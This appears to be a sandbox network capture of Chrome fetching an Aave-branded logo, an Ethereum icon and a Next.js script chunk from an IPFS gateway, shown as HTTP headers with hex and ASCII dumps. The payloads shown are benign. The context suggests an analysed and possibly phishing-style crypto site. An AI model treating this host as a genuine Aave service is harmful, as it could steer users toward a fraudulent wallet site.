                                                                                                                                                                                                                                                  2024-09-28 04:11:39 UTC1369INData Raw: fb 34 fe 8a 8f fb 3b c5 f9 06 25 54 f9 92 8b 56 2e 1e 2e e4 39 01 f2 8d 7d f3 96 5b 70 c0 72 cf 67 ec e0 e7 8a d2 3a 6c fd ea 10 96 c7 00 e3 0e 06 8a c5 08 13 cc b0 64 6d 8d 39 da e9 a0 93 2e ba e9 a1 97 3e eb 8f 56 6b 79 1c ce 24 9d db b4 66 3f 37 6e 7c 63 32 29 c0 18 f6 2d 44 87 c5 56 90 b5 99 56 ed 74 64 9d 26 56 17 dd f4 d0 4b 9f f5 af a4 9b 93 e5 72 bb 47 f3 07 54 a0 5a 0d b2 5a 75 ea 51 50 35 68 44 d3 a4 59 8b 56 6d da 75 e8 d4 47 59 d1 fb fe 9e 3d cd f6 93 e4 38 be 00 97 55 6d 36 c6 fb e8 79 7f 1b d4 34 4d 77 2b 7d 61 d3 14 89 e7 f0 83 16 77 b1 30 be cb 93 98 ab 95 40 79 2f fb b0 71 4d b8 fb 2c b2 78 d3 6e 12 18 c3 f6 3c 4b dc 43 bf 9a 04 c5 bd 11 ca 24 e8 7d 28 35 fd 21 ab e1 90 21 dd c3 01 b0 b9 58 9f f5 f0 5c b8 ae 57 6b 58 42 6c 4b e6 43 14 ea
                                                                                                                                                                                                                                                  Data Ascii: 4;%TV..9}[prg:ldm9.>Vky$f?7n|c2)-DVVtd&VKrGTZZuQP5hDYVmuGY=8Um6y4Mw+}aw0@y/qM,xn<KC$}(5!!X\WkXBlKC


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  10192.168.2.549721209.94.90.24431076C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-09-28 04:11:39 UTC767OUTGET /aaveLogo.svg HTTP/1.1
                                                                                                                                                                                                                                                  Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                  Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                  Referer: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/
                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                  Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
                                                                                                                                                                                                                                                  2024-09-28 04:11:39 UTC1201INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Sat, 28 Sep 2024 04:11:39 GMT
                                                                                                                                                                                                                                                  Content-Type: image/svg+xml
                                                                                                                                                                                                                                                  Content-Length: 2978
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  access-control-allow-headers: Content-Type
                                                                                                                                                                                                                                                  access-control-allow-headers: Range
                                                                                                                                                                                                                                                  access-control-allow-headers: User-Agent
                                                                                                                                                                                                                                                  access-control-allow-headers: X-Requested-With
                                                                                                                                                                                                                                                  access-control-allow-methods: GET
                                                                                                                                                                                                                                                  access-control-allow-methods: HEAD
                                                                                                                                                                                                                                                  access-control-allow-methods: OPTIONS
                                                                                                                                                                                                                                                  access-control-allow-origin: *
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Length
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Range
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Chunked-Output
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Path
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Roots
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Stream-Output
                                                                                                                                                                                                                                                  Cache-Control: public, max-age=29030400, immutable
                                                                                                                                                                                                                                                  etag: "bafkreievo5k5yvqt4mcghuabr4ky5nilodbjahhraupado3h7hwgwzrbsq"
                                                                                                                                                                                                                                                  x-ipfs-path: /ipfs/bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy/aaveLogo.svg
                                                                                                                                                                                                                                                  x-ipfs-roots: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy,bafkreievo5k5yvqt4mcghuabr4ky5nilodbjahhraupado3h7hwgwzrbsq
                                                                                                                                                                                                                                                  x-ipfs-pop: rainbow-ny5-03
                                                                                                                                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                                                                                                                                  Age: 73293
                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                  CF-RAY: 8ca0e4064b6041fe-EWR
                                                                                                                                                                                                                                                  2024-09-28 04:11:39 UTC168INData Raw: 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 78 6d 6c 6e 73 3a 78 6c 69 6e 6b 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 6c 69 6e 6b 22 20 77 69 64 74 68 3d 22 37 31 2e 39 38 39 22 20 68 65 69 67 68 74 3d 22 32 30 22 20 64 61 74 61 2d 6e 61 6d 65 3d 22 47 72 6f 75 70 20 31 33 38 35 39 22 3e 3c 64 65 66 73 3e 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 20 69 64 3d 22 61 22 20 78 31 3d 22 2d
                                                                                                                                                                                                                                                  Data Ascii: <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="71.989" height="20" data-name="Group 13859"><defs><linearGradient id="a" x1="-
                                                                                                                                                                                                                                                  2024-09-28 04:11:39 UTC1369INData Raw: 31 2e 39 39 39 22 20 78 32 3d 22 31 2e 39 36 32 22 20 79 31 3d 22 31 2e 30 33 34 22 20 79 32 3d 22 2e 31 31 32 22 20 67 72 61 64 69 65 6e 74 55 6e 69 74 73 3d 22 6f 62 6a 65 63 74 42 6f 75 6e 64 69 6e 67 42 6f 78 22 3e 3c 73 74 6f 70 20 6f 66 66 73 65 74 3d 22 30 22 20 73 74 6f 70 2d 63 6f 6c 6f 72 3d 22 23 33 30 62 61 63 36 22 2f 3e 3c 73 74 6f 70 20 6f 66 66 73 65 74 3d 22 31 22 20 73 74 6f 70 2d 63 6f 6c 6f 72 3d 22 23 62 36 35 30 39 65 22 2f 3e 3c 2f 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 3e 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 20 69 64 3d 22 62 22 20 78 31 3d 22 2d 34 2e 30 34 38 22 20 78 32 3d 22 31 2e 31 38 31 22 20 79 31 3d 22 31 2e 33 31 35 22 20 79 32 3d 22 2e 33 37 39 22 20 78 6c 69 6e 6b 3a 68 72 65 66 3d 22 23 61 22 2f 3e 3c 6c 69
                                                                                                                                                                                                                                                  Data Ascii: 1.999" x2="1.962" y1="1.034" y2=".112" gradientUnits="objectBoundingBox"><stop offset="0" stop-color="#30bac6"/><stop offset="1" stop-color="#b6509e"/></linearGradient><linearGradient id="b" x1="-4.048" x2="1.181" y1="1.315" y2=".379" xlink:href="#a"/><li
                                                                                                                                                                                                                                                  2024-09-28 04:11:39 UTC1369INData Raw: 20 30 20 30 20 31 20 2e 33 36 2e 38 35 37 20 31 2e 30 38 39 20 31 2e 30 38 39 20 30 20 30 20 31 2d 2e 33 36 2e 38 34 20 31 2e 32 20 31 2e 32 20 30 20 30 20 31 2d 2e 38 35 37 2e 33 34 33 68 2d 31 31 2e 33 33 32 61 31 2e 31 32 20 31 2e 31 32 20 30 20 30 20 31 2d 2e 39 30 38 2d 2e 33 36 32 7a 22 20 64 61 74 61 2d 6e 61 6d 65 3d 22 50 61 74 68 20 32 34 33 32 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 32 38 33 2e 35 32 33 20 2d 2e 36 36 33 29 22 2f 3e 3c 70 61 74 68 20 66 69 6c 6c 3d 22 75 72 6c 28 23 63 29 22 20 64 3d 22 4d 31 34 31 2e 39 36 34 20 31 38 2e 32 31 38 20 31 33 34 2e 39 39 20 31 2e 33 61 31 2e 38 37 36 20 31 2e 38 37 36 20 30 20 30 20 30 2d 31 2e 37 34 38 2d 31 2e 33 68 2d 2e 36 31 37 61 31 2e 38 37 36 20 31 2e 38 37
                                                                                                                                                                                                                                                  Data Ascii: 0 0 1 .36.857 1.089 1.089 0 0 1-.36.84 1.2 1.2 0 0 1-.857.343h-11.332a1.12 1.12 0 0 1-.908-.362z" data-name="Path 2432" transform="translate(-283.523 -.663)"/><path fill="url(#c)" d="M141.964 18.218 134.99 1.3a1.876 1.876 0 0 0-1.748-1.3h-.617a1.876 1.87
                                                                                                                                                                                                                                                  2024-09-28 04:11:39 UTC72INData Raw: 22 20 64 61 74 61 2d 6e 61 6d 65 3d 22 50 61 74 68 20 32 34 33 34 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 2d 32 2e 32 29 22 2f 3e 3c 2f 67 3e 3c 2f 67 3e 3c 2f 67 3e 3c 2f 73 76 67 3e 0a
                                                                                                                                                                                                                                                  Data Ascii: " data-name="Path 2434" transform="translate(-2.2)"/></g></g></g></svg>


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  11192.168.2.549719209.94.90.24431076C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-09-28 04:11:39 UTC782OUTGET /icons/networks/ethereum.svg HTTP/1.1
                                                                                                                                                                                                                                                  Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                  Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                  Referer: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/
                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                  Cookie: __cflb=02DiuHFpDhc3YAVzwBqGVx23Wx7BLmnbsd1SxZG9bHeR2
                                                                                                                                                                                                                                                  2024-09-28 04:11:39 UTC1336INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Sat, 28 Sep 2024 04:11:39 GMT
                                                                                                                                                                                                                                                  Content-Type: image/svg+xml
                                                                                                                                                                                                                                                  Content-Length: 6321
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  access-control-allow-headers: Content-Type
                                                                                                                                                                                                                                                  access-control-allow-headers: Range
                                                                                                                                                                                                                                                  access-control-allow-headers: User-Agent
                                                                                                                                                                                                                                                  access-control-allow-headers: X-Requested-With
                                                                                                                                                                                                                                                  access-control-allow-methods: GET
                                                                                                                                                                                                                                                  access-control-allow-methods: HEAD
                                                                                                                                                                                                                                                  access-control-allow-methods: OPTIONS
                                                                                                                                                                                                                                                  access-control-allow-origin: *
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Length
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Range
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Chunked-Output
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Path
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Roots
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Stream-Output
                                                                                                                                                                                                                                                  Cache-Control: public, max-age=29030400, immutable
                                                                                                                                                                                                                                                  etag: "bafkreia3vt3hz4kt5ui56n2qsei6qu5zfqe6f4k24jotauvdwvioq7xhza"
                                                                                                                                                                                                                                                  x-ipfs-path: /ipfs/bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy/icons/networks/ethereum.svg
                                                                                                                                                                                                                                                  x-ipfs-roots: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy,bafybeig3gyfey2cvkgtdeyklommqqwwsiwdiuxrnhyhxqmdojzxzf2p22a,bafybeihvadgjlbkifvoyhws7wx5l7tscpcnsvgny6bzcsirgr6kuoegc4y,bafkreia3vt3hz4kt5ui56n2qsei6qu5zfqe6f4k24jotauvdwvioq7xhza
                                                                                                                                                                                                                                                  x-ipfs-pop: rainbow-ny5-03
                                                                                                                                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                                                                                                                                  Age: 73293
                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                                  CF-RAY: 8ca0e40648360f37-EWR
                                                                                                                                                                                                                                                  2024-09-28 04:11:39 UTC33INData Raw: 3c 73 76 67 20 77 69 64 74 68 3d 22 32 34 22 20 68 65 69 67 68 74 3d 22 32 34 22 20 66 69 6c 6c 3d
                                                                                                                                                                                                                                                  Data Ascii: <svg width="24" height="24" fill=
                                                                                                                                                                                                                                                  2024-09-28 04:11:39 UTC1369INData Raw: 22 6e 6f 6e 65 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 78 6d 6c 6e 73 3a 78 6c 69 6e 6b 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 6c 69 6e 6b 22 3e 3c 70 61 74 68 20 66 69 6c 6c 3d 22 75 72 6c 28 23 61 29 22 20 64 3d 22 4d 30 20 30 68 32 34 76 32 34 48 30 7a 22 2f 3e 3c 64 65 66 73 3e 3c 70 61 74 74 65 72 6e 20 69 64 3d 22 61 22 20 70 61 74 74 65 72 6e 43 6f 6e 74 65 6e 74 55 6e 69 74 73 3d 22 6f 62 6a 65 63 74 42 6f 75 6e 64 69 6e 67 42 6f 78 22 20 77 69 64 74 68 3d 22 31 22 20 68 65 69 67 68 74 3d 22 31 22 3e 3c 75 73 65 20 78 6c 69 6e 6b 3a 68 72 65 66 3d 22 23 62 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 73 63 61 6c 65 28 2e 30 30 37 38 31 29 22 2f
                                                                                                                                                                                                                                                  Data Ascii: "none" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"><path fill="url(#a)" d="M0 0h24v24H0z"/><defs><pattern id="a" patternContentUnits="objectBoundingBox" width="1" height="1"><use xlink:href="#b" transform="scale(.00781)"/
                                                                                                                                                                                                                                                  2024-09-28 04:11:39 UTC1369INData Raw: 46 41 67 6d 56 50 6a 78 70 46 41 73 69 2b 74 4e 34 42 37 2b 63 62 31 74 57 37 39 31 48 4b 78 69 39 63 69 53 58 41 33 73 4f 54 44 49 31 44 6e 79 77 6d 2f 4d 39 32 45 54 73 2f 54 74 41 63 35 44 46 4c 57 41 65 50 31 36 2b 43 48 36 55 42 6f 41 57 65 33 6e 48 65 4b 41 4b 41 70 4d 41 69 33 34 70 64 6b 6c 70 7a 65 4e 63 73 64 36 31 6c 7a 34 79 79 52 71 4d 68 4a 51 42 49 38 4d 41 54 4a 6a 55 49 55 51 68 70 6f 32 50 44 78 6a 44 73 6d 44 61 32 33 2b 30 53 39 74 33 5a 6d 52 62 77 34 7a 51 41 43 4c 42 72 33 77 56 6d 4f 57 5a 70 4e 32 41 43 62 43 52 6c 4e 39 74 6c 62 74 49 31 30 4b 71 48 46 6e 37 55 46 75 77 46 41 50 6a 67 62 2b 58 57 6d 6e 6c 56 67 55 30 4f 46 57 70 4b 68 71 33 61 68 49 5a 52 4d 49 39 2f 66 63 78 6a 46 79 2b 31 71 6e 36 66 44 43 49 43 6a 42 79 74 73
                                                                                                                                                                                                                                                  Data Ascii: FAgmVPjxpFAsi+tN4B7+cb1tW791HKxi9ciSXA3sOTDI1Dnywm/M92ETs/TtAc5DFLWAeP16+CH6UBoAWe3nHeKAKApMAi34pdklpzeNcsd61lz4yyRqMhJQBI8MATJjUIUQhpo2PDxjDsmDa23+0S9t3ZmRbw4zQACLBr3wVmOWZpN2ACbCRlN9tlbtI10KqHFn7UFuwFAPjgb+XWmnlVgU0OFWpKhq3ahIZRMI9/fcxjFy+1qn6fDCICjByts
                                                                                                                                                                                                                                                  2024-09-28 04:11:39 UTC1369INData Raw: 73 79 47 63 58 32 30 41 47 41 66 77 66 34 67 4e 73 33 6e 6d 65 44 52 2b 5a 7a 45 77 45 74 46 64 2b 33 36 74 33 67 35 41 76 68 49 55 56 73 58 78 68 36 2f 68 2f 2b 4e 50 30 78 68 34 51 34 41 63 79 77 39 34 2f 58 6d 63 48 59 6c 53 37 44 33 37 77 66 2b 6e 47 55 66 62 55 77 42 69 44 61 37 6c 66 6f 74 50 38 62 39 36 6c 74 2f 63 51 73 4f 2b 79 62 4f 39 4f 48 59 46 48 6e 71 43 61 30 32 36 6e 76 70 31 69 2b 34 2f 4a 53 33 49 51 2b 4b 6a 39 56 64 74 71 44 48 56 36 47 67 4c 67 47 59 78 61 36 69 70 66 4c 49 6e 58 5a 62 6c 6b 75 59 34 5a 78 47 77 63 6c 4e 34 6b 32 2f 52 4d 67 33 33 36 31 53 57 32 37 30 4d 35 38 44 36 67 55 61 42 48 6e 56 75 78 70 63 5a 65 66 48 4f 63 49 61 43 55 2f 36 7a 4b 50 32 77 57 75 6b 34 31 42 2f 5a 64 73 34 73 71 61 73 66 53 48 53 50 52 55 37
                                                                                                                                                                                                                                                  Data Ascii: syGcX20AGAfwf4gNs3nmeDR+ZzEwEtFd+36t3g5AvhIUVsXxh6/h/+NP0xh4Q4Acyw94/XmcHYlS7D37wf+nGUfbUwBiDa7lfotP8b96lt/cQsO+ybO9OHYFHnqCa026nvp1i+4/JS3IQ+Kj9VdtqDHV6GgLgGYxa6ipfLInXZblkuY4ZxGwclN4k2/RMg3361SW270M58D6gUaBHnVuxpcZefHOcIaCU/6zKP2wWuk41B/Zds4sqasfSHSPRU7
                                                                                                                                                                                                                                                  2024-09-28 04:11:39 UTC1369INData Raw: 4e 62 32 57 69 53 45 36 54 67 31 44 53 53 4c 56 56 74 38 41 6e 78 42 77 46 6c 58 78 73 34 4f 66 50 36 4a 37 68 67 45 4a 48 6f 73 49 67 50 61 46 69 69 73 58 32 67 4f 49 46 42 4a 4d 31 39 2b 48 61 37 6d 73 6b 5a 67 56 7a 44 54 50 74 30 77 4e 30 33 56 79 4b 4e 51 6d 6c 6e 69 4e 32 2b 41 42 4c 42 73 2f 67 50 44 52 38 6f 36 62 39 52 4e 46 41 48 54 72 2f 72 4a 53 50 6e 79 4c 74 67 44 69 41 76 68 67 68 2f 2f 52 56 64 56 31 42 62 4b 57 79 61 45 36 54 77 2b 48 54 37 35 6f 51 31 68 34 74 4c 4b 68 4d 55 51 6c 41 65 30 48 2b 4f 57 46 51 51 6f 54 41 49 31 51 32 52 52 76 64 46 45 78 43 31 67 32 46 76 48 45 43 33 70 36 41 37 64 4e 44 32 2b 32 41 2f 52 7a 44 67 57 67 36 44 61 70 68 48 2f 48 31 43 2b 34 61 34 74 49 67 47 73 50 72 36 32 79 31 77 50 71 32 69 63 41 7a 73 74
                                                                                                                                                                                                                                                  Data Ascii: Nb2WiSE6Tg1DSSLVVt8AnxBwFlXxs4OfP6J7hgEJHosIgPaFiisX2gOIFBJM19+Ha7mskZgVzDTPt0wN03VyKNQmlniN2+ABLBs/gPDR8o6b9RNFAHTr/rJSPnyLtgDiAvhgh//RVdV1BbKWyaE6Tw+HT75oQ1h4tLKhMUQlAe0H+OWFQQoTAI1Q2RRvdFExC1g2FvHEC3p6A7dND2+2A/RzDgWg6DaphH/H1C+4a4tIgGsPr62y1wPq2icAzst
                                                                                                                                                                                                                                                  2024-09-28 04:11:39 UTC812INData Raw: 4f 70 30 4c 65 78 46 46 43 61 41 4f 64 34 39 73 37 30 69 68 34 35 45 72 67 51 75 41 69 33 76 61 35 56 2b 75 73 43 79 36 58 47 64 67 42 62 6c 70 54 2f 67 52 52 51 6d 41 4d 4b 39 69 4a 37 56 36 52 71 58 65 54 39 64 6b 44 65 65 71 64 4a 62 36 45 37 63 57 4c 48 70 4b 5a 30 45 4a 4d 6f 4c 70 6d 78 6a 43 78 49 41 4d 34 39 45 7a 2b 68 31 6a 5a 36 43 7a 46 4f 42 56 64 52 44 56 6d 2f 74 46 6c 4e 49 34 48 73 52 2b 51 51 77 79 62 73 48 4d 6f 61 73 69 38 49 78 55 37 70 67 70 53 6e 56 41 65 62 74 49 2b 49 49 76 48 74 55 67 6b 44 6f 6f 41 45 67 57 2b 31 4b 66 70 67 78 61 42 4f 59 30 6a 44 45 50 44 35 45 38 64 49 42 58 47 6b 65 30 4e 6a 57 70 63 34 50 67 78 34 2b 35 68 4e 4e 44 65 73 69 53 67 46 51 47 70 42 4a 5a 37 4f 51 76 58 75 32 71 33 64 44 57 4d 35 61 48 2f 4e 78
                                                                                                                                                                                                                                                  Data Ascii: Op0LexFFCaAOd49s70ih45ErgQuAi3va5V+usCy6XGdgBblpT/gRRQmAMK9iJ7V6RqXeT9dkDeeqdJb6E7cWLHpKZ0EJMoLpmxjCxIAM49Ez+h1jZ6CzFOBVdRDVm/tFlNI4HsR+QQwybsHMoasi8IxU7pgpSnVAebtI+IIvHtUgkDooAEgW+1KfpgxaBOY0jDEPD5E8dIBXGke0NjWpc4Pgx4+5hNNDesiSgFQGpBJZ7OQvXu2q3dDWM5aH/Nx


                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  12192.168.2.549722209.94.90.24431076C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-09-28 04:11:39 UTC677OUTGET /_next/static/chunks/6782.5dfef7893dd5bea4.js HTTP/1.1
                                                                                                                                                                                                                                                  Host: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link
                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                  Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                  Referer: https://bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy.ipfs.dweb.link/
                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                  2024-09-28 04:11:39 UTC1360INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Date: Sat, 28 Sep 2024 04:11:39 GMT
                                                                                                                                                                                                                                                  Content-Type: text/javascript; charset=utf-8
                                                                                                                                                                                                                                                  Content-Length: 24489
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  access-control-allow-headers: Content-Type
                                                                                                                                                                                                                                                  access-control-allow-headers: Range
                                                                                                                                                                                                                                                  access-control-allow-headers: User-Agent
                                                                                                                                                                                                                                                  access-control-allow-headers: X-Requested-With
                                                                                                                                                                                                                                                  access-control-allow-methods: GET
                                                                                                                                                                                                                                                  access-control-allow-methods: HEAD
                                                                                                                                                                                                                                                  access-control-allow-methods: OPTIONS
                                                                                                                                                                                                                                                  access-control-allow-origin: *
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Length
                                                                                                                                                                                                                                                  access-control-expose-headers: Content-Range
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Chunked-Output
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Path
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Ipfs-Roots
                                                                                                                                                                                                                                                  access-control-expose-headers: X-Stream-Output
                                                                                                                                                                                                                                                  Cache-Control: public, max-age=29030400, immutable
                                                                                                                                                                                                                                                  etag: "bafkreies3zcd6e6alsnndbmz4wqavngwp6dlzarbg5xj2pvfe3fqqqgaa4"
                                                                                                                                                                                                                                                  x-ipfs-path: /ipfs/bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy/_next/static/chunks/6782.5dfef7893dd5bea4.js
                                                                                                                                                                                                                                                  x-ipfs-roots: bafybeihwopeeamsw6gk3vbg3wbftvt3n2qngbzo5a4hlnpvlv4hc3vvmyy,bafybeibkk2t3wa2shw62jhntzsugx2oh7gf6zlbu3gb6gdxmeuwt6wi6se,bafybeihww4l5iuauf4leipzwanhudgpdxwdltpxcn6hqqud65jpcaq33xe,bafybeigaj3cwdjktvw36akiq43niv2siihkxaslemvv33lw5mhruragm5a,bafkreies3zcd6e6alsnndbmz4wqavngwp6dlzarbg5xj2pvfe3fqqqgaa4
                                                                                                                                                                                                                                                  x-ipfs-pop: rainbow-ny5-04
                                                                                                                                                                                                                                                  CF-Cache-Status: HIT
                                                                                                                                                                                                                                                  Age: 13028473
                                                                                                                                                                                                                                                  2024-09-28 04:11:39 UTC74INData Raw: 41 63 63 65 70 74 2d 52 61 6e 67 65 73 3a 20 62 79 74 65 73 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 63 61 30 65 34 30 36 34 65 34 33 34 31 64 65 2d 45 57 52 0d 0a 0d 0a
                                                                                                                                                                                                                                                  Data Ascii: Accept-Ranges: bytesServer: cloudflareCF-RAY: 8ca0e4064e4341de-EWR
                                                                                                                                                                                                                                                  2024-09-28 04:11:39 UTC1304INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 3d 73 65 6c 66 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 5f 4e 5f 45 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 36 37 38 32 5d 2c 7b 36 32 37 35 33 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 72 29 7b 76 61 72 20 6e 3d 72 28 36 34 38 33 36 29 3b 74 2e 5a 3d 76 6f 69 64 20 30 3b 76 61 72 20 6f 3d 6e 28 72 28 36 34 39 33 38 29 29 2c 69 3d 72 28 38 35 38 39 33 29 2c 61 3d 28 30 2c 6f 2e 64 65 66 61 75 6c 74 29 28 28 30 2c 69 2e 6a 73 78 29 28 22 70 61 74 68 22 2c 7b 64 3a 22 6d 31 39 2e 37 37 20 37 2e 32 33 2e 30 31 2d 2e 30 31 2d 33 2e 37 32 2d 33 2e 37 32 4c 31 35 20 34 2e 35 36 6c 32 2e 31 31 20 32 2e 31 31 63 2d 2e 39 34 2e 33 36 2d 31 2e 36 31 20 31 2e 32 36
                                                                                                                                                                                                                                                  Data Ascii: "use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[6782],{62753:function(e,t,r){var n=r(64836);t.Z=void 0;var o=n(r(64938)),i=r(85893),a=(0,o.default)((0,i.jsx)("path",{d:"m19.77 7.23.01-.01-3.72-3.72L15 4.56l2.11 2.11c-.94.36-1.61 1.26
